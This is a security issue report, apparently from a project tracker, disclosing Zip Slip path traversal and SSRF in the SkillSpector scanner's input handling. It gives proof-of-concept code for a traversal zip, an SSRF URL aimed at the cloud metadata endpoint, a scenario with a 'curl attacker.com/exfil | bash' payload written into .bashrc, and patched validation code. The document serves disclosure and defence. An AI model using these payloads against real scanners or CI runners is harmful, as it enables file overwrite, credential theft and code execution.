[Security] Zip Slip path traversal and SSRF via permissive Git URL validation in InputHandler

## Summary

Imagine a post office that opens every parcel to inspect it for safety, but the inspection room has no blast containment — so a parcel *designed to explode on opening* detonates in the very facility meant to keep everyone safe. That's the paradox here: SkillSpector is a security scanner that is itself vulnerable to the attacks it should be detecting.

Two separate vulnerabilities exist in the `InputHandler`:

1. **Zip Slip (Path Traversal)**: When processing `.zip` skill archives, `_extract_zip()` calls `zipfile.extractall()` without validating that extracted paths stay within the target directory. A malicious zip can write files anywhere on the filesystem.

2. **SSRF (Server-Side Request Forgery)**: The `_is_git_url()` validation uses substring matching (`if any(host in parsed.netloc for host in git_hosts)`) and accepts any URL ending in `.git`. This allows an attacker to trick SkillSpector into making requests to internal network endpoints, cloud metadata services, or arbitrary hosts.

## Relation to Existing Issues

- **Zip Slip** was independently reported in #109 by @HetCreep, with a fix proposed in PR #116 (using Python 3.12 `filter="data"`). That PR remains unmerged.
- **SSRF via `_is_git_url()`** is a separate, previously unreported vulnerability in the same component. It is not covered by #109, #116, #21, or #62 (which is about *detecting* SSRF in scanned skills, not SSRF in SkillSpector itself).
- #21 by @wernerkasselman-au covers resource exhaustion in the ingest layer (unbounded downloads, zip bombs) but not path traversal or SSRF.

This issue consolidates both under one coherent attack surface analysis of `InputHandler`, as they share the same root cause: **the ingest layer processes attacker-controlled input without validation**.

## Why This Matters — Real-World Scenario

**Scenario 1: Zip Slip in a CI/CD scanning pipeline**

A company runs SkillSpector in their CI pipeline to vet community-submitted skills before publishing to an internal registry. The scanner runs as a GitHub Action on a shared runner.

A malicious contributor submits a skill as a `.zip` archive. Inside, the zip contains:
```
SKILL.md                                   (looks normal)
../../../home/runner/.bashrc               (payload: curl attacker.com/exfil | bash)
```

The CI pipeline downloads and scans the zip. SkillSpector's `_extract_zip()` unpacks it, writing to `../../../home/runner/.bashrc`. The next time any job runs on that runner, the injected script exfiltrates secrets and source code.

**Scenario 2: SSRF via Git URL on a cloud instance**

The same pipeline accepts Git URLs for scanning. An attacker submits:
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name.git
```

SkillSpector validates this URL: `169.254.169.254` is not in the default `git_hosts` list, but the URL ends in `.git`, and the fallback path accepts it. The scanner's host (an EC2 instance) issues a `git clone` to the metadata endpoint. Even though the clone fails, the HTTP request reaches the metadata service — and in some configurations, the error output or network logs expose IAM credentials.

In both cases, the security scanner itself becomes the attack vector.

## Reproduction

### Zip Slip

```python
import zipfile

# Create a malicious zip: one normal file plus one entry with a traversal path
with zipfile.ZipFile("/tmp/evil-skill.zip", "w") as zf:
    zf.writestr("SKILL.md", "---\nname: test\n---\n# Normal")
    zf.writestr("../../etc/pwned.txt", "you have been pwned")
```

```bash
skillspector scan /tmp/evil-skill.zip --no-llm
# Check whether pwned.txt was created outside the temp extract dir
# (the exact path depends on where that directory lives)
ls -la /tmp/etc/pwned.txt  # Should NOT exist, but it does
```
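
Where the escaped file lands depends on how deep the extraction directory sits. The sketch below only does the path arithmetic for an unsanitized join; the directory names are hypothetical placeholders for whatever `tempfile.mkdtemp()` returns, and `naive_target` is an illustrative helper, not part of SkillSpector.

```python
import posixpath


def naive_target(extract_dir: str, member_name: str) -> str:
    """Return where an unsanitized join of extract_dir and member_name lands."""
    return posixpath.normpath(posixpath.join(extract_dir, member_name))


# Hypothetical extraction directories; real names come from tempfile.mkdtemp().
print(naive_target("/tmp/tmpabc123", "../../etc/pwned.txt"))       # /etc/pwned.txt
print(naive_target("/tmp/work/tmpabc123", "../../etc/pwned.txt"))  # /tmp/etc/pwned.txt
```

When verifying the reproduction, check the location that matches the actual extraction directory on your system.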

### SSRF

```bash
# Point to an internal HTTP service (simulated)
skillspector scan "http://169.254.169.254/latest/meta-data.git" --no-llm
# Observe: git clone attempt is made to the metadata endpoint
# Even on failure, the HTTP request reaches the target
```

## Root Cause

### Zip Slip — `src/skillspector/input_handler.py` lines 181-182:

```python
def _extract_zip(self, zip_path: Path) -> Path:
    extract_dir = Path(tempfile.mkdtemp())
    with zipfile.ZipFile(zip_path, "r") as zf:
        zf.extractall(extract_dir)  # No path traversal check!
    return extract_dir
```

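`_extract_zip()` passes an attacker-controlled archive straight to `ZipFile.extractall()` and performs no containment check of its own. Python's documentation warns against extracting archives from untrusted sources without prior inspection, because entries with absolute names or `..` components may end up outside the target directory; the module attempts to sanitize such names, but that is best-effort and should not be the scanner's only defense. The fix is to validate that each entry's resolved path stays within `extract_dir` before extraction.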
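
One way to implement that validation is sketched below. It is a minimal illustration, not the project's actual patch: `safe_extract_zip` is a hypothetical standalone function, and it assumes Python 3.9+ for `Path.is_relative_to`. Every entry is checked before anything is written, so a single bad entry rejects the whole archive.

```python
import shutil
import tempfile
import zipfile
from pathlib import Path


def safe_extract_zip(zip_path: Path) -> Path:
    """Extract zip_path into a fresh temp dir, rejecting entries that escape it."""
    extract_dir = Path(tempfile.mkdtemp()).resolve()
    try:
        with zipfile.ZipFile(zip_path, "r") as zf:
            for info in zf.infolist():
                # Resolve where a plain join would place this entry.
                # An absolute member name replaces extract_dir entirely,
                # so it fails the containment check as well.
                target = (extract_dir / info.filename).resolve()
                if not target.is_relative_to(extract_dir):
                    raise ValueError(f"unsafe path in archive: {info.filename!r}")
            # Extract only after every entry has passed the check.
            zf.extractall(extract_dir)
    except Exception:
        # Do not leave a half-populated temp dir behind on failure.
        shutil.rmtree(extract_dir, ignore_errors=True)
        raise
    return extract_dir
```

Rejecting the archive outright, rather than silently skipping bad entries, also gives the scanner a clear signal that the skill itself is malicious.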

### SSRF — `src/skillspector/input_handler.py` lines 105-117:

```python
def _is_git_url(self, input_str: str) -> bool:
    git_hosts = ["github.com", "gitlab.com", "bitbucket.org"]
    parsed = urlparse(input_str)
    if parsed.scheme in ("http", "https", "git", "ssh"):
        if any(host in parsed.netloc for host in git_hosts):  # Substring match!
            return True
        if input_str.endswith(".git"):
            return True  # Any URL ending in .git is accepted
    return False
```

Two problems:
1. **Substring matching**: `"github.com" in "evil-github.com"` is `True` — an attacker-controlled domain `evil-github.com` passes validation
2. **`.git` suffix fallback**: Any URL ending in `.git` is accepted regardless of host, allowing internal network targets with a `.git` suffix
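
A stricter check could compare the parsed hostname exactly against an allowlist and drop the `.git` fallback. The sketch below is an assumption about what such a fix might look like, not the maintainers' implementation: `is_allowed_git_url` and `ALLOWED_GIT_HOSTS` are hypothetical names, and restricting the scheme to `https` is a policy choice made here for illustration.

```python
from urllib.parse import urlparse

# Assumed allowlist, mirroring the hosts in the original git_hosts list.
ALLOWED_GIT_HOSTS = {"github.com", "gitlab.com", "bitbucket.org"}


def is_allowed_git_url(url: str) -> bool:
    """Accept only https URLs whose hostname exactly matches the allowlist."""
    parsed = urlparse(url)
    if parsed.scheme != "https":  # assumption: plain http/git/ssh are rejected
        return False
    # .hostname excludes userinfo and port, unlike .netloc, and is lowercased.
    host = parsed.hostname or ""
    return host in ALLOWED_GIT_HOSTS


candidates = [
    "https://github.com/org/repo.git",              # legitimate
    "https://evil-github.com/org/repo.git",         # substring bypass
    "https://github.com@evil.example/repo.git",     # userinfo trick in netloc
    "http://169.254.169.254/latest/meta-data.git",  # .git suffix fallback
]
for url in candidates:
    print(f"{is_allowed_git_url(url)!s:5}  {url}")
```

Using `parsed.hostname` rather than `parsed.netloc` matters because `netloc` includes any `user@` prefix and port, so a URL such as `https://github.com@evil.example/repo.git` contains the string `github.com` while actually pointing at `evil.example`.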

The `_clone_git()` method (lines 125-148) then runs `git clone` on the accepted URL without `--depth 1` to limit how much is fetched, and without environment variables such as `GIT_TERMINAL_PROMPT=0` and `GIT_ASKPASS=/bin/true` that stop git from prompting for (and potentially leaking) credentials.
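
A hardened invocation might look like the following sketch. The helper names, the `--` separator, and the 60-second timeout are assumptions added for illustration; only `--depth 1`, `GIT_TERMINAL_PROMPT=0`, and `GIT_ASKPASS=/bin/true` come from the analysis above. It is meant to run only after the URL has passed validation.

```python
import os
import subprocess
from pathlib import Path


def build_clone_command(url: str, dest: Path) -> list[str]:
    """Build a shallow clone command; '--' keeps a crafted URL from being read as an option."""
    return ["git", "clone", "--depth", "1", "--", url, str(dest)]


def build_clone_env() -> dict[str, str]:
    """Copy the current environment and disable interactive credential prompts."""
    env = dict(os.environ)
    env["GIT_TERMINAL_PROMPT"] = "0"  # never prompt on the terminal
    env["GIT_ASKPASS"] = "/bin/true"  # credential helper that supplies nothing
    return env


def clone_shallow(url: str, dest: Path, timeout: float = 60.0) -> None:
    """Run the clone; raises CalledProcessError or TimeoutExpired on failure."""
    subprocess.run(
        build_clone_command(url, dest),
        env=build_clone_env(),
        check=True,
        timeout=timeout,       # assumed limit; tune for real repositories
        capture_output=True,   # keep git's output out of the scanner's own logs
    )
```

These flags reduce exposure but do not replace URL validation: a shallow, non-interactive clone of an internal endpoint is still a request to that endpoint.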

## Impact

- **Zip Slip**: Arbitrary file write on the host filesystem — can overwrite configuration files, inject backdoors into CI runners, or corrupt system files
- **SSRF**: Network requests to internal services, cloud metadata endpoints (169.254.169.254), or arbitrary external hosts from the scanner's network position
- **Privilege escalation path**: Zip Slip + CI runner = code execution as the CI service account
- **Supply chain risk**: A scanner vulnerability means the security gate itself is compromised — all skills passing through it are at risk
- **Trust violation**: Security tools are granted elevated access precisely because they're trusted; a vulnerability here has outsized blast radius

## Affected Version

SkillSpector v2.2.3
